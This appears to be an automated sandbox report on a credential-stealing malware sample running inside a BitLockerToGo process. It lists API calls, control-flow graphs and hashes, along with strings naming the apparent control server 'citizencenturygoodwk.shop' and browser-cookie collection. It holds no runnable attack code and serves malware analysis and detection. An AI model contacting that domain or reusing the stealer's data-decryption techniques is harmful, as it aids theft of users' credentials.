LdrInitializeThunk 11386->11387 11388 2473dd 11387->11388 
11390 245c00 LdrInitializeThunk 11388->11390 11391 247a60 11388->11391 11394 263660 11388->11394 11390->11388 11391->11391 11392 24b540 LdrInitializeThunk 11391->11392 11393 247ffd 11392->11393 11395 26a5b0 LdrInitializeThunk 11394->11395 11404 263682 11395->11404 11396 2637f4 11396->11388 11397 263812 11412 265bd0 11397->11412 11400 263857 11400->11396 11424 267840 LdrInitializeThunk 11400->11424 11403 26373e 11403->11396 11403->11397 11403->11400 11408 265980 11403->11408 11404->11396 11404->11397 11404->11400 11404->11403 11407 267840 LdrInitializeThunk 11404->11407 11407->11403 11409 265a8e 11408->11409 11410 265997 11408->11410 11409->11403 11410->11409 11425 267840 LdrInitializeThunk 11410->11425 11413 263823 11412->11413 11414 265beb 11412->11414 11420 265ad0 11413->11420 11414->11413 11418 265cae 11414->11418 11426 267840 LdrInitializeThunk 11414->11426 11415 265ad0 LdrInitializeThunk 11415->11413 11417 265dbe 11417->11413 11417->11415 11418->11417 11427 267840 LdrInitializeThunk 11418->11427 11421 265ae6 11420->11421 11422 265b9e 11420->11422 11421->11422 11428 267840 LdrInitializeThunk 11421->11428 11422->11396 11424->11396 11425->11409 11426->11418 11427->11417 11428->11422

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
                • String ID: %$ $0%$=%$d%$d%$d%$d%$d%$d%$d%$d%$d%$d%$d%$d%$d%$%
                • API String ID: 1449868515-3877251930
                • Opcode ID: 8c10c3568b3d2cc95893da5cc164a9dbc802a1e7b36923cc51df75e45fcd38a9
                • Instruction ID: 8cbc8028599e4161cfe7936fb7de0aa996f67dba11790ebd307913682356b689
                • Opcode Fuzzy Hash: 8c10c3568b3d2cc95893da5cc164a9dbc802a1e7b36923cc51df75e45fcd38a9
                • Instruction Fuzzy Hash: BEA169B8519384CFD364EF29D549B8EBBE0BB86308F01891DE4989B350D7B49958CF83

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 277 250bd0-250be3 278 250d40-250d42 277->278 279 250be9-250c83 277->279 280 250f4d-250f56 278->280 281 250c85 279->281 282 250cd2-250d01 279->282 284 250c90-250cd0 281->284 283 250d10-250d19 282->283 283->283 285 250d1b 283->285 284->282 284->284 286 250d20-250d29 285->286 286->286 287 250d2b-250d37 286->287 288 250d47-250d4b 287->288 289 250d39-250d3e 287->289 290 250d4e-250d5f call 238b70 288->290 289->290 293 250d81-250d8f 290->293 294 250d61-250d66 290->294 296 250db1-250dbe 293->296 297 250d91-250d94 293->297 295 250d70-250d7f 294->295 295->293 295->295 298 250de1-250e1a 296->298 299 250dc0-250dc4 296->299 300 250da0-250daf 297->300 302 250e65-250ed4 298->302 303 250e1c-250e1f 298->303 301 250dd0-250ddf 299->301 300->296 300->300 301->298 301->301 305 250ed6 302->305 306 250f21-250f3a call 24b540 302->306 304 250e20-250e63 303->304 304->302 304->304 307 250ee0-250f1f 305->307 309 250f3f-250f4a call 238b80 306->309 307->306 307->307 309->280
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: %M#O$2qps$6U3W$>] _$J9t;$M-P/$\9V;$]!L#$i[k
                • API String ID: 0-229164349
                • Opcode ID: be216cfc19fc37cba791122f34637780977f9b688bb577a6aa96b9ab978fc0fa
                • Instruction ID: a9c25398d451c8176f8b4af4255b80e9c6a7a5d708ad25a43d33b15c6f077232
                • Opcode Fuzzy Hash: be216cfc19fc37cba791122f34637780977f9b688bb577a6aa96b9ab978fc0fa
                • Instruction Fuzzy Hash: 059197B15183019BD314CF08C891B6BBBF1EF85758F188A1DF8C98B291E774D955CB8A

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 320 24e880-24e8f1 321 24e960-24e9a3 320->321 322 24e8f3 320->322 325 24e9a5-24e9aa 321->325 326 24e9ac 321->326 323 24e900-24e95e 322->323 323->321 323->323 327 24e9af-24ea13 call 238b70 325->327 326->327 331 24ea15 327->331 332 24ea62-24ea8f 327->332 333 24ea20-24ea60 331->333 334 24ea91-24ea96 332->334 335 24ea98-24ea9a 332->335 333->332 333->333 336 24ea9d-24eaae call 238b70 334->336 335->336 339 24eab0-24eab5 336->339 340 24ead1-24eae1 336->340 341 24eac0-24eacf 339->341 342 24eb01-24eb26 call 26a780 340->342 343 24eae3-24eaea 340->343 341->340 341->341 347 24ed15-24ed22 342->347 348 24ee75-24eeaa 342->348 349 24eb40-24ebf8 342->349 350 24ed30-24edf2 342->350 351 24eb2d-24eb37 342->351 352 24ed2a 342->352 344 24eaf0-24eaff 343->344 344->342 344->344 347->352 357 24eee6-24ef83 348->357 358 24eeac-24eeaf 348->358 355 24ec55-24ec82 349->355 356 24ebfa 349->356 353 24edf4 350->353 354 24ee37-24ee4a call 24ba00 350->354 351->349 352->350 361 24ee00-24ee35 353->361 370 24ee4f-24ee52 354->370 364 24ec84-24ec89 355->364 365 24ec8b-24ec8d 355->365 363 24ec00-24ec53 356->363 359 24ef85 357->359 360 24efe7-24f006 call 24b540 357->360 366 24eeb0-24eee4 358->366 368 24ef90-24efe5 359->368 377 24f00e 360->377 361->354 361->361 363->355 363->363 367 24ec90-24eca1 call 238b70 364->367 365->367 366->357 366->366 375 24ecc1-24ecd1 367->375 376 24eca3-24ecaa 367->376 368->360 368->368 374 24ee5a 370->374 381 24ee60-24ee6c call 238b80 374->381 379 24ecf1-24ed0e call 26a780 375->379 380 24ecd3-24ecda 375->380 378 24ecb0-24ecbf 376->378 383 24f014-24f01f call 238b80 377->383 378->375 378->378 379->347 379->348 379->352 379->374 379->377 379->381 379->383 390 24f044 379->390 391 24f020-24f026 call 238b80 379->391 392 24f02f 379->392 393 24f04a 379->393 394 24f035-24f03b call 238b80 379->394 395 24f056-24f05f 379->395 396 24f050 379->396 382 24ece0-24ecef 380->382 381->348 382->379 382->382 383->391 390->393 391->392 392->394 393->396 394->390 
396->395
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: `w$b6$cw$pD$sm$~w$IK
                • API String ID: 0-200013828
                • Opcode ID: d56207edc5df73067c3cb23cc7f5528efc44b285c30c6587dc332019aba30a87
                • Instruction ID: af2394fc85c973728bc9ae6bc369fcfdeb6eb01f12b85ef56b5d54afe34af40f
                • Opcode Fuzzy Hash: d56207edc5df73067c3cb23cc7f5528efc44b285c30c6587dc332019aba30a87
                • Instruction Fuzzy Hash: 091264B02183819FD728DF14D89076BBBF1FF85348F448A2CE4DA9B291D7749946CB86

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 401 23f490-23f4ca 402 23f51c-23f599 401->402 403 23f4cc-23f4cf 401->403 405 23f5f5-23f606 402->405 406 23f59b 402->406 404 23f4d0-23f51a 403->404 404->402 404->404 408 23f61b-23f623 405->408 409 23f608-23f60f 405->409 407 23f5a0-23f5f3 406->407 407->405 407->407 411 23f625-23f626 408->411 412 23f63b-23f648 408->412 410 23f610-23f619 409->410 410->408 410->410 413 23f630-23f639 411->413 414 23f66b-23f673 412->414 415 23f64a-23f651 412->415 413->412 413->413 416 23f675-23f676 414->416 417 23f68b-23f7d7 414->417 418 23f660-23f669 415->418 419 23f680-23f689 416->419 420 23f82a-23f88c 417->420 421 23f7d9 417->421 418->414 418->418 419->417 419->419 423 23f8e6-23f90d call 23c3b0 420->423 424 23f88e-23f88f 420->424 422 23f7e0-23f828 421->422 422->420 422->422 427 23f912-23f92c 423->427 425 23f890-23f8e4 424->425 425->423 425->425
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: Fty~$Nxav$citizencenturygoodwk.shop$imk/$}NQ~$~q$y{
                • API String ID: 0-1436070459
                • Opcode ID: 2688bfa67c234044be391b1faf937c4f2d5bfc0d670027e0dd8eda5ed911e1cf
                • Instruction ID: 9a41ac17dbffe10a05678dd9eb5e0f85425e34e27d91bfc3d375d0e59c4cf59d
                • Opcode Fuzzy Hash: 2688bfa67c234044be391b1faf937c4f2d5bfc0d670027e0dd8eda5ed911e1cf
                • Instruction Fuzzy Hash: 18B186B05493C28BD3308F14D594BABBBE1BFC6318F184A6CD4E86B262D33459458B96

                Control-flow Graph

                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: 0$@A$D=C?$MT$N\KO$RZ
                • API String ID: 0-3970104136
                • Opcode ID: 7c635f16c986e7b9e7db33a05ddff2aed9ebf9d5085147d8a85ec44971303022
                • Instruction ID: 380879797b187d1850263fa619dea1df1d073bc6f639667b8e9ecff8be8089b5
                • Opcode Fuzzy Hash: 7c635f16c986e7b9e7db33a05ddff2aed9ebf9d5085147d8a85ec44971303022
                • Instruction Fuzzy Hash: AA0242B0218381AFD314CF24C490B6BBBE2ABC5744F14992DF4DA8B391D779D84ADB52

                Control-flow Graph

                APIs
                • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 00258C7F
                • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 00258D9F
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: ComputerName
                • String ID: C@@I$~H@^
                • API String ID: 3545744682-4183127737
                • Opcode ID: 40db6bf8cd5ca8e4e63e829d25f93f7d06c3f9d5189734c7bd6c718e0058fe7b
                • Instruction ID: 0cce9864cea07caaed9a87717f90ec85729f34c60229c38869cf2967a5fda539
                • Opcode Fuzzy Hash: 40db6bf8cd5ca8e4e63e829d25f93f7d06c3f9d5189734c7bd6c718e0058fe7b
                • Instruction Fuzzy Hash: DAF19D70110B828FD725CF29C490B62FBF1BF56305F188A8DD8E68B792CB75A859CB54

                Control-flow Graph

                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: )E({$1I1O$1M9C$6A6G$:U"K
                • API String ID: 0-2515482740
                • Opcode ID: 0e053627b820832c178c70764854b2aca3cce5e0b81dc7b59eb4f69ac3346932
                • Instruction ID: 6ef6893b52d037ea028a36139fe27dfdf7ddd667e82efd3c69ccdd1586d56a0b
                • Opcode Fuzzy Hash: 0e053627b820832c178c70764854b2aca3cce5e0b81dc7b59eb4f69ac3346932
                • Instruction Fuzzy Hash: 3AF199B0228341DFE724CF24D894B6BBBE1FBC5344F14892CE9898B2A1DB74D855CB56

                Control-flow Graph

                Strings
                • (, xrefs: 00247C5E
                • bK, xrefs: 00247223
                • [info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 00247CE7
                • zy, xrefs: 00247172
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: ($[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser$bK$zy
                • API String ID: 0-201287715
                • Opcode ID: ef951401f10c4ad3ba310d74e664e437bc532f0a26884c7ff4f82f94850f2d18
                • Instruction ID: 98aa773badf54307be971ed449613e0b5b457a7a2f3ac802cb40319e0e756a97
                • Opcode Fuzzy Hash: ef951401f10c4ad3ba310d74e664e437bc532f0a26884c7ff4f82f94850f2d18
                • Instruction Fuzzy Hash: 7F5298B16183418BD728CF14C49076BBBE2FFC5358F18891CE8DA9B391E7349959CB86
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: # '"$..$8
                • API String ID: 0-2078804138
                • Opcode ID: ce146192f420846baf2a8adff7522c9e6a1bddcd6a961f533d13c285e8f66db9
                • Instruction ID: 2e4ac73aa4b70d1afc9e9553ad8b4c8c89e10e7e7efc1961a8f2621d6a8c5c0b
                • Opcode Fuzzy Hash: ce146192f420846baf2a8adff7522c9e6a1bddcd6a961f533d13c285e8f66db9
                • Instruction Fuzzy Hash: 2B02B7B29283428FD704DF28D885A6BB7E1FF86308F08492DF49587251E775D929CB93
                APIs
                • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00263495
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: InformationVolume
                • String ID: \
                • API String ID: 2039140958-2967466578
                • Opcode ID: 8dd77cf3231da489d40f786eb88a00d3723f290159b009829298c694924614ac
                • Instruction ID: f63fc3f7949787d4f4e8fa34d33f58cb2ecf81993473699f3627945abfe85549
                • Opcode Fuzzy Hash: 8dd77cf3231da489d40f786eb88a00d3723f290159b009829298c694924614ac
                • Instruction Fuzzy Hash: E5011D74695340FAF6249F10ED0BF2AB6A5AB84F08F20981CB34C7A1D1DAF0B955CA5D
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: )$IEND
                • API String ID: 0-707183367
                • Opcode ID: d20be4de738b4abbba78e0010ba43acb04f9904f8ebe33d724b347dde21e6c9e
                • Instruction ID: 4c82c90b6f608a9782aa34ff18105d9facb7dc25a84a082fb6e1b07d99d90d3d
                • Opcode Fuzzy Hash: d20be4de738b4abbba78e0010ba43acb04f9904f8ebe33d724b347dde21e6c9e
                • Instruction Fuzzy Hash: 2DE1F0B1A183459FD710DF28D88075BBBE1AB98308F14892DF9989B382D775ED15CBC2
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: # '"$..
                • API String ID: 0-4124739383
                • Opcode ID: 59a402ad5122dd026dd375a25ad053e46d45a5f9e7908db39dc8215441c5ed5c
                • Instruction ID: c96681353bd8c0a10138dfc6bd8ff4fe8bc7657d6371812f1b78bec2395f7a32
                • Opcode Fuzzy Hash: 59a402ad5122dd026dd375a25ad053e46d45a5f9e7908db39dc8215441c5ed5c
                • Instruction Fuzzy Hash: D7D1B7B19283428BC708DF28D88566BB7E1FF86308F08492DE89597351E775D929CB93
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: Psm`$avub
                • API String ID: 0-1111646547
                • Opcode ID: 0516f83b62a76c7914842f728a13b4d13d4e0290d24b932dacc389e318782292
                • Instruction ID: 1c7ae2673d10f042ccc5262cdd260a56f664bf81297cb6044323f7421578496e
                • Opcode Fuzzy Hash: 0516f83b62a76c7914842f728a13b4d13d4e0290d24b932dacc389e318782292
                • Instruction Fuzzy Hash: D1C1F1B1A283028BD714DF18C891B2BB7E1EF94356F144A2DE8C587351E375DC68CB9A
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: 2]$$gdeb
                • API String ID: 0-447610410
                • Opcode ID: 6e306f29005c97e8c1dcfd278a4e092b541f7c9d9d2b4756df2857c574420c0b
                • Instruction ID: 5e0884013899abf3b663acb38ccc78a68d3ab33fd3f89096d86d12dfb7328a5f
                • Opcode Fuzzy Hash: 6e306f29005c97e8c1dcfd278a4e092b541f7c9d9d2b4756df2857c574420c0b
                • Instruction Fuzzy Hash: 81A12571A24321DBC728DF18CC9267BB3A1FF95314F49452CF8C68B292E7349920C792
                APIs
                • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00246E95
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: CryptDataUnprotect
                • String ID:
                • API String ID: 834300711-0
                • Opcode ID: b5d32d1a92acb50e6fc49fb51257e74ceee8de3a7188df1da9336d643bf4d166
                • Instruction ID: df060103b00b8ed06e3a53df980447bc7141fa3a086a9461bade0a4263fa7525
                • Opcode Fuzzy Hash: b5d32d1a92acb50e6fc49fb51257e74ceee8de3a7188df1da9336d643bf4d166
                • Instruction Fuzzy Hash: E8A1E0B1A18381CFC718CF18C851A6BBBE2EF86354F08495DF4968B791D770E855CB82
                APIs
                • RtlAllocateHeap.NTDLL(?,00000000), ref: 00265516
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 446bb3dd99f337085344ef983c6628913db96edda16ac3f53183ab26ac6adaf0
                • Instruction ID: ac7eadb5fe761144490fdffd129b6458afa4957a17de2a4ef8715d903eb135b2
                • Opcode Fuzzy Hash: 446bb3dd99f337085344ef983c6628913db96edda16ac3f53183ab26ac6adaf0
                • Instruction Fuzzy Hash: B9C08C30AD840056E10CCF10EC20F32F26E8B86309F14A008800923392C4A0D492511C
                APIs
                • LdrInitializeThunk.NTDLL(0026A75C,005C003F,00000006,00120089,?,00000018,8A858487,00000000,00245CFA), ref: 00267866
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
                • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c05a0fcfc4dd6fdb13bd668f8f81325eadacf9737250c536f16cf8726166f1f7
                • Instruction ID: 6fad488f3b93b0bf76c56b14df0fbeddc09ce30f520b7d96b5202747010dbd2b
                • Opcode Fuzzy Hash: c05a0fcfc4dd6fdb13bd668f8f81325eadacf9737250c536f16cf8726166f1f7
                • Instruction Fuzzy Hash: 0DE1F4B1620701CFC728CF18C8A1A66B7F1FF99314B19859DD89A8F791EB74E851CB90
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 063b7e355c6ed8e3c2d4d90a9fe9593c05cd03a15dc1441d82070766a1440bd6
                • Instruction ID: ed9727127b00cf5759180b253bf337447d1951f627b925255942ec3157cd336e
                • Opcode Fuzzy Hash: 063b7e355c6ed8e3c2d4d90a9fe9593c05cd03a15dc1441d82070766a1440bd6
                • Instruction Fuzzy Hash: C24133715183118BC304CF18D8946ABB7F0EFC6769F048A1CF8A94B2A1E774C999C792
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8a54390c2ce96f46f118c01d70b6a37f7567bf6128a91dbf51fae7463c3fea1c
                • Instruction ID: a38bc8e61b8f595f325b4bced9e355af624e748b149093a0c2e6b2f6f6c575e3
                • Opcode Fuzzy Hash: 8a54390c2ce96f46f118c01d70b6a37f7567bf6128a91dbf51fae7463c3fea1c
                • Instruction Fuzzy Hash: 53F03AB4518341CFC320DF24C50838BB7E4BB84314F418A1CD8A847254DBB1A5848F82

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: LibraryLoad
                • String ID: !$"$'$'$'$($($+$-$3$3$3$3$5$5$6$8$:$<$?$A$A$A$B$B$C$C$C$E$F$G$G$I$K$L$M$O$R$S$Z$`$a$c$citizencenturygoodwk.shop$e$g$i$k$k$m$m$o$p$q$q$s$s$u$u$w$w$y$y${${$}$}
                • API String ID: 1029625771-3154137496
                • Opcode ID: 490b7e71eda077f76078e9786c51cf1846d9015ff303bba7483922951dd7bba2
                • Instruction ID: 522ef9650e23957391ec5def440f5cedc8b4928b425ca010f36bb0a98224d6d4
                • Opcode Fuzzy Hash: 490b7e71eda077f76078e9786c51cf1846d9015ff303bba7483922951dd7bba2
                • Instruction Fuzzy Hash: A2822AB011C7C1CED331CB28888879BBFE1AB96314F144A6DE0E98B392D7B58555DB63
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: FreeLibrary
                • String ID: #v
                • API String ID: 3664257935-554117064
                • Opcode ID: 0c5a253c5be72396f6ffe038e987eaa6476e22734d6e934a754e1dd02dce449c
                • Instruction ID: 772066457c44ad8af1d230426251f640f738c82b6a5d211149d7ae85e0700aed
                • Opcode Fuzzy Hash: 0c5a253c5be72396f6ffe038e987eaa6476e22734d6e934a754e1dd02dce449c
                • Instruction Fuzzy Hash: C8319C74110742CFDB25CF29C490B22FBF1AF16305F18898DD8D69B796CBB5A859CB21
                APIs
                Strings
                • system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 00239222
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: ExitProcess
                • String ID: system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways
                • API String ID: 621844428-780655312
                • Opcode ID: d3d1fd7f57641e523e14f1145ecc7d6e8faa98e4eb7e413a7a8267f5ff811ded
                • Instruction ID: e9c39ec8c38067c2f27cd5b5bf2a29b7e9e0bc9fcbe5635134cc49f83be69832
                • Opcode Fuzzy Hash: d3d1fd7f57641e523e14f1145ecc7d6e8faa98e4eb7e413a7a8267f5ff811ded
                • Instruction Fuzzy Hash: 6EF0E5F0D38E04A6CA507BB9A7072AF37A85F13304F504522ED8151102EBF188F56EA3
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: AllocString
                • String ID:
                • API String ID: 2525500382-0
                • Opcode ID: 9f5c6f7d9bbf59e1d152cb43af99d4aa355fe435d8d7da797c2d16536c2ec58b
                • Instruction ID: 9c0c54d73b657763503d38e0232e8c7211650754b796d894c7cb4008a7dd1fb6
                • Opcode Fuzzy Hash: 9f5c6f7d9bbf59e1d152cb43af99d4aa355fe435d8d7da797c2d16536c2ec58b
                • Instruction Fuzzy Hash: 91411870208B829FD325CF3DC894746FBA16B5A224F048B5CE0F98BBE1D734A555CB92
                APIs
                • LoadLibraryExW.KERNELBASE(?,00000000,00000800), ref: 00267568
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: 5611aba2e3efb2b86284b31005bf5c07c4859124d0789c9155530fe034e10275
                • Instruction ID: 60e396cf266ad0a4f535f22470b7928b5915ae9a48ab1d330dc62233c67432a7
                • Opcode Fuzzy Hash: 5611aba2e3efb2b86284b31005bf5c07c4859124d0789c9155530fe034e10275
                • Instruction Fuzzy Hash: CA217C30715B008BD724CF28C9D1B52B7E2FB45704B14896ED8AB87B92DB64F8468B04
                APIs
                • GetLogicalDrives.KERNELBASE ref: 00266FA4
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: DrivesLogical
                • String ID:
                • API String ID: 999431828-0
                • Opcode ID: 1b73541f5bcff43ebe26c7557c971eedb3bfbd08542f464fdd940f7d0dcb51aa
                • Instruction ID: 19ac0a8b2ae86bf04e045aacfca676a4f9425671ef34c544b2dceed50b1b1553
                • Opcode Fuzzy Hash: 1b73541f5bcff43ebe26c7557c971eedb3bfbd08542f464fdd940f7d0dcb51aa
                • Instruction Fuzzy Hash: DFE032B97007008BD320DF28EC86912B7E5FB59318744282CE88ACB752D670E855CF20
                APIs
                • GetUserDefaultUILanguage.KERNELBASE ref: 00262BC6
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: DefaultLanguageUser
                • String ID:
                • API String ID: 95929093-0
                • Opcode ID: 8a454d74741738155cb0d19fa001e1202456f4d5fb223d28f236dd25129abc6a
                • Instruction ID: a23a4351c2c757416f62161aa654582aa7199b99effe4e44ab69843a8413eceb
                • Opcode Fuzzy Hash: 8a454d74741738155cb0d19fa001e1202456f4d5fb223d28f236dd25129abc6a
                • Instruction Fuzzy Hash: E6E0D8BA124600CFC310EF78D94424A7BE2BBC8304F55852CD98847345D730B585CF81
                APIs
                • RtlReAllocateHeap.NTDLL(?,00000000), ref: 002677EA
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: e6212235c42533e534e3f55510c78357616fbb52f896657a4a58cd93f7427da8
